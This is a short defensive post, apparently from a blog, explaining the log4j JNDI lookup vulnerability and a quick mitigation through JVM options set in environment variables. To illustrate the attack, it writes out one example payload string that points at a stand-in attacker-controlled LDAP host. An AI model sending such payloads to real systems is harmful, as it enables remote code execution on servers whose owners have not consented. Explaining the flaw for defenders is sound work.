Quick fix for log4j vulnerability using environment variables

the attack surface for the log4j vulnerabity is quite large.
Checkout https://github.com/YfryTchsGD/Log4jAttackSurface

Log4j is an open source apache logging framework, which is used in many applications. By default when log4j logs request data the contained URLs are processed by the logging framework via “Java Naming Directory Interface (JNDI)”. That means a hacker can easily send a malicious request, which results in ${jndi:ldap://malicious-domain.com/a} in the logs. The malicious-domain.com is controlled by the hacker. The Log4j vulnerability is triggered by automatically making a request to malicious-domain.com via JNDI. The response from the hacker’s controlled domain contains a remote Java class file which is injected into the logging framework’s server process, which can execute arbitrary code.

How to fix

The most easy fix is to turn off the default behaviour log4j processing URL lookups in log messages.

Luckily there is a configuration option in log4j to exactly accomplish this.


In lots of java based web apps java options are controlled by environment variables. That means you can easily add the above configuration option in the startup script of your java apps.

For example:



export JAVA_OPTS="-Dlog4j2.formatMsgNoLookups=true"

or on Windows based apps

set EXTRA_JAVA_OPTS=-Dlog4j2.formatMsgNoLookups=true